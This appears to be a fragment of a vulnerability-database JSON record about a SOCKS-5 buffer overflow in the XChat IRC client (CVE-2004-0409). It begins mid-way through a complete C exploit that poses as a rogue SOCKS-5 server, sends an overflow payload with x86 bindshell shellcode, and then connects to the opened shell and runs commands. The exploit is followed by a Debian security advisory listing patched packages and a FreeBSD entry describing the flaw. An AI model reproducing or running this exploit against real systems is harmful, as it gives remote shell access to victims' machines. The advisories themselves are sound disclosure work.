*\r\n * i just saw several cryptic advisories about this bug, so i figured *\r\n * i would look into it and see exactly what it was. *\r\n * *\r\n * if X-Chat attempts to connect to a server(through socks-5) *\r\n * immediately upon the start of X-Chat(\"autoconnect\") it will make *\r\n * the shellcode location a bit easier to find. on both source *\r\n * compiled version 1.8.0(on rh7.1) and mandrake's rpm static binary *\r\n * version 2.0.5(on mdk9.1) an offset of 2600 worked. *\r\n * *\r\n * note: the first thing that is sent to the bindshell, upon *\r\n * successful exploitation, is \"killall -9 xchat\". this will kill *\r\n * X-Chat, but still keep the bindshell alive/active. when searching *\r\n * for the correct offset, use increments of 100(100,200,300,...). 
*\r\n **********************************************************************/\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <strings.h>\r\n#include <signal.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/time.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#define BUFSIZE 255\r\n#define BSEADDR 0xbffffffa\r\n#define DFLPORT 1080\r\n#define DFLSPRT 7979\r\n#define TIMEOUT 5\r\nstatic char x86_exec[]= /* bindshell(??), netric based. */\r\n \"\\x31\\xc0\\x50\\x40\\x89\\xc3\\x50\\x40\\x50\\x89\\xe1\\xb0\\x66\"\r\n \"\\xcd\\x80\\x31\\xd2\\x52\\x66\\x68\\x00\\x00\\x43\\x66\\x53\\x89\"\r\n \"\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x40\\x89\"\r\n \"\\x44\\x24\\x04\\x43\\x43\\xb0\\x66\\xcd\\x80\\x83\\xc4\\x0c\\x52\"\r\n \"\\x52\\x43\\xb0\\x66\\xcd\\x80\\x93\\x89\\xd1\\xb0\\x3f\\xcd\\x80\"\r\n \"\\x41\\x80\\xf9\\x03\\x75\\xf6\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\"\r\n \"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\"\r\n \"\\x80\";\r\nchar *getcode(unsigned int);\r\nchar *socks5_bind(unsigned short,unsigned int);\r\nvoid getshell(char *,unsigned short);\r\nvoid printe(char *,short);\r\nvoid sig_alarm(){printe(\"alarm/timeout hit.\",1);}\r\nint main(int argc,char **argv){\r\n unsigned short port=DFLPORT,sport=DFLSPRT;\r\n unsigned int retaddr=BSEADDR;\r\n char *hostptr;\r\n if(BUFSIZE<0||BUFSIZE>255)printe(\"BUFSIZE must be 1-255(char/int8).\",1);\r\n printf(\"[*] X-Chat[v1.8.0-v2.0.8]: socks-5 remote buffer overflow exp\"\r\n \"loit.\\n[*] by: by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\\n\\n\");\r\n if(argc<2){\r\n printf(\"[!] 
syntax: %s <offset from 0x%.8x> [port] [shell port]\\n\\n\",\r\n argv[0],BSEADDR);\r\n exit(1);\r\n }\r\n if(argc>1)retaddr-=atoi(argv[1]);\r\n if(argc>2)port=atoi(argv[2]);\r\n if(argc>3)sport=atoi(argv[3]);\r\n x86_exec[20]=(sport&0xff00)>>8;\r\n x86_exec[21]=(sport&0x00ff);\r\n printf(\"[*] eip: 0x%.8x, socks-5 port: %u, bindshell port: %u.\\n\",\r\n retaddr,port,sport);\r\n hostptr=socks5_bind(port,retaddr);\r\n sleep(1);\r\n getshell(hostptr,sport);\r\n exit(0);\r\n}\r\nchar *getcode(unsigned int retaddr){\r\n unsigned char i=0;\r\n char *buf;\r\n if(!(buf=(char *)malloc(BUFSIZE+1)))\r\n printe(\"getcode(): allocating memory failed.\",1);\r\n memset(buf,0x90,BUFSIZE);\r\n for(i=0;i<64;i+=4){*(long *)&buf[i]=retaddr;}\r\n memcpy((buf+BUFSIZE-strlen(x86_exec)),x86_exec,strlen(x86_exec));\r\n return(buf);\r\n}\r\nchar *socks5_bind(unsigned short port,unsigned int retaddr){\r\n int ssock=0,sock=0,so=1;\r\n socklen_t salen=0;\r\n unsigned char *buf;\r\n struct sockaddr_in ssa,sa;\r\n ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\r\n setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));\r\n#ifdef SO_REUSEPORT\r\n setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));\r\n#endif\r\n ssa.sin_family=AF_INET;\r\n ssa.sin_port=htons(port);\r\n ssa.sin_addr.s_addr=INADDR_ANY;\r\n printf(\"[*] awaiting connection from: *:%d.\\n\",port);\r\n if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)\r\n printe(\"could not bind socket.\",1);\r\n listen(ssock,2);\r\n bzero((char*)&sa,sizeof(struct sockaddr_in));\r\n salen=sizeof(sa);\r\n sock=accept(ssock,(struct sockaddr *)&sa,&salen);\r\n close(ssock);\r\n printf(\"[*] socks-5 server connection established.\\n\");\r\n if(!(buf=(unsigned char *)malloc(BUFSIZE+7+1)))\r\n printe(\"socks5_bind(): allocating memory failed.\",1);\r\n memcpy(buf,\"\\x05\\x00\\x05\\x00\\x00\\x03\",6);\r\n buf[6]=BUFSIZE;\r\n memcpy(buf+7,getcode(retaddr),BUFSIZE);\r\n printf(\"[*] sending specially crafted string. 
(exploit)\\n\");\r\n write(sock,buf,BUFSIZE+7);\r\n free(buf);\r\n sleep(1);\r\n close(sock);\r\n printf(\"[*] socks-5 server connection closed.\\n\");\r\n return(inet_ntoa(sa.sin_addr));\r\n}\r\nvoid getshell(char *hostname,unsigned short port){\r\n int sock,r;\r\n fd_set fds;\r\n char buf[4096+1];\r\n struct hostent *he;\r\n struct sockaddr_in sa;\r\n printf(\"[*] checking to see if the exploit was successful.\\n\");\r\n if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)\r\n printe(\"getshell(): socket() failed.\",1);\r\n sa.sin_family=AF_INET;\r\n if((sa.sin_addr.s_addr=inet_addr(hostname))){\r\n if(!(he=gethostbyname(hostname)))\r\n printe(\"getshell(): couldn't resolve.\",1);\r\n memcpy((char *)&sa.sin_addr,(char *)he->h_addr,\r\n sizeof(sa.sin_addr));\r\n }\r\n sa.sin_port=htons(port);\r\n signal(SIGALRM,sig_alarm);\r\n alarm(TIMEOUT);\r\n printf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port);\r\n if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){\r\n printf(\"[!] connection failed: %s:%d.\\n\",hostname,port);\r\n return;\r\n }\r\n alarm(0);\r\n printf(\"[*] successfully connected: %s:%d.\\n\\n\",hostname,port);\r\n signal(SIGINT,SIG_IGN);\r\n write(sock,\"uname -a;id ;killall -9 xchat\\n\",30);\r\n while(1){\r\n FD_ZERO(&fds);\r\n FD_SET(0,&fds);\r\n FD_SET(sock,&fds);\r\n if(select(sock+1,&fds,0,0,0)<1)\r\n printe(\"getshell(): select() failed.\",1);\r\n if(FD_ISSET(0,&fds)){\r\n if((r=read(0,buf,4096))<1)\r\n printe(\"getshell(): read() failed.\",1);\r\n if(write(sock,buf,r)!=r)\r\n printe(\"getshell(): write() failed.\",1);\r\n }\r\n if(FD_ISSET(sock,&fds)){\r\n if((r=read(sock,buf,4096))<1)\r\n exit(0);\r\n write(1,buf,r);\r\n }\r\n }\r\n close(sock);\r\n return;\r\n}\r\nvoid printe(char *err,short e){\r\n printf(\"[!] 
%s\\n\",err);\r\n if(e)exit(1);\r\n return;\r\n}\r\n\n\n// milw0rm.com [2004-05-05]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/296/"}], "debian": [{"lastseen": "2020-11-11T13:25:47", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0409"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 493-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 21st, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : xchat\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2004-0409\nDebian Bug : 244184\n\nA buffer overflow has been discovered in the Socks-5 proxy code of\nXChat, an IRC client for X similar to AmIRC. This allows an attacker\nto execute arbitrary code on the users' machine.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.8.9-0woody3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 2.0.8-1.\n\nWe recommend that you upgrade your xchat and related packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3.dsc\n Size/MD5 checksum: 877 80161873b2e115faa33cd38000645dce\n 
http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3.diff.gz\n Size/MD5 checksum: 18200 215990506f737d853b23911843a68b41\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9.orig.tar.gz\n Size/MD5 checksum: 1310151 05701f0c567ce1ece6577c69f146e6b3\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat-common_1.8.9-0woody3_all.deb\n Size/MD5 checksum: 598110 9a586950e3db6f9ebee14c9637d8d61a\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_alpha.deb\n Size/MD5 checksum: 223084 90b4e3be1d3ef7ec25231e72ebc1130b\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_alpha.deb\n Size/MD5 checksum: 229794 d26d9de27c8567e3dffb483c5174df02\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_alpha.deb\n Size/MD5 checksum: 122376 3d69e44fff6af517f8f166bb750b6c4a\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_arm.deb\n Size/MD5 checksum: 179850 656145636a317c8ab847183ee68c3337\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_arm.deb\n Size/MD5 checksum: 186350 d25c11fe60901dfdd128e46d5e3e88e1\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_arm.deb\n Size/MD5 checksum: 92846 d207049438e8eaf61a342c69112addec\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_i386.deb\n Size/MD5 checksum: 168598 3a9cb05afb7a7e4c7c77d4979aa24470\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_i386.deb\n Size/MD5 checksum: 174968 1bdf20e898c3ee9fd268c1207ed1901c\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_i386.deb\n Size/MD5 checksum: 87394 8d11e3d2a13e73a5c3bc8d1f751244e9\n\n Intel IA-64 architecture:\n\n 
http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_ia64.deb\n Size/MD5 checksum: 289266 7322e0d408f74a9c68eb582db9828585\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_ia64.deb\n Size/MD5 checksum: 297118 b70f1cc13747a01d96a266a7d08c00bc\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_ia64.deb\n Size/MD5 checksum: 149788 96e423bd9ec333b9a2b106a4c870f8d5\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_hppa.deb\n Size/MD5 checksum: 207100 71997ea804e37ab7fb6293db978b4ef2\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_hppa.deb\n Size/MD5 checksum: 213642 d7987c5011d5bc3611e6464e918c401d\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_hppa.deb\n Size/MD5 checksum: 107238 37c42b96721e8f3875a9cd0407c157cc\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_m68k.deb\n Size/MD5 checksum: 157760 427f7bb644140e438f5df3768099753d\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_m68k.deb\n Size/MD5 checksum: 165064 5447693913028bf26cf7a9c7182a78e2\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_m68k.deb\n Size/MD5 checksum: 82208 6229d6b8e40e7ecdf4f98be89211cd55\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_mips.deb\n Size/MD5 checksum: 194996 2df78a22d4eb4c730bfe929f885f31eb\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_mips.deb\n Size/MD5 checksum: 200876 eca41c98214dc3f8d99be1efe7edd73c\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_mips.deb\n Size/MD5 checksum: 104438 20f57a03806e1b78d4cb2d2ba9551a13\n\n Little endian MIPS architecture:\n\n 
http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_mipsel.deb\n Size/MD5 checksum: 192936 9c93014ec994684379e884e27bcbf602\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_mipsel.deb\n Size/MD5 checksum: 198400 f60a58cba1bb2f38c9c34a1bfd53a702\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_mipsel.deb\n Size/MD5 checksum: 103356 2dffd5defbe8bc940eaf9bdace649182\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_powerpc.deb\n Size/MD5 checksum: 184834 8ce64505fe3157d915a7240c0ab5e22a\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_powerpc.deb\n Size/MD5 checksum: 191582 73971bd2a49f071c3ebeaee72832550d\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_powerpc.deb\n Size/MD5 checksum: 98256 a3548189c57565b3c5c243870550a26f\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_s390.deb\n Size/MD5 checksum: 182596 7ad31d7bef7cf4863f7e87f336ffe08a\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_s390.deb\n Size/MD5 checksum: 189590 41cdf6dbb7906474fa757c5a490f05de\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_s390.deb\n Size/MD5 checksum: 94964 ac501925c362d92b1d87fc712bdae944\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_sparc.deb\n Size/MD5 checksum: 180672 1749044dd1a8e02232e086fc660d5654\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_sparc.deb\n Size/MD5 checksum: 186952 00a868cd3c240165059d7aeed792ab20\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_sparc.deb\n Size/MD5 checksum: 95146 d094ced15db96ad34b417f3213f31808\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- 
---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2004-04-21T00:00:00", "published": "2004-04-21T00:00:00", "id": "DEBIAN:DSA-493-1:C476E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00093.html", "title": "[SECURITY] [DSA 493-1] New xchat packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:17", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0409"], "description": "\nA straightforward stack buffer overflow exists in XChat's\n\t Socks5 proxy support.\nThe XChat developers report that `tsifra' discovered this\n\t issue.\nNOTE: XChat Socks5 support is disabled by default in the\n\t FreeBSD Ports Collection, so a port build is only exposed if\n\t Socks5 support was explicitly enabled and a Socks5 proxy is configured.\n", "edition": 4, "modified": "2004-05-03T00:00:00", "published": "2004-04-05T00:00:00", "id": "8338A20F-9573-11D8-9366-0020ED76EF5A", "href": "https://vuxml.freebsd.org/freebsd/8338a20f-9573-11d8-9366-0020ed76ef5a.html", "title": "xchat remotely exploitable buffer overflow (Socks5)", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}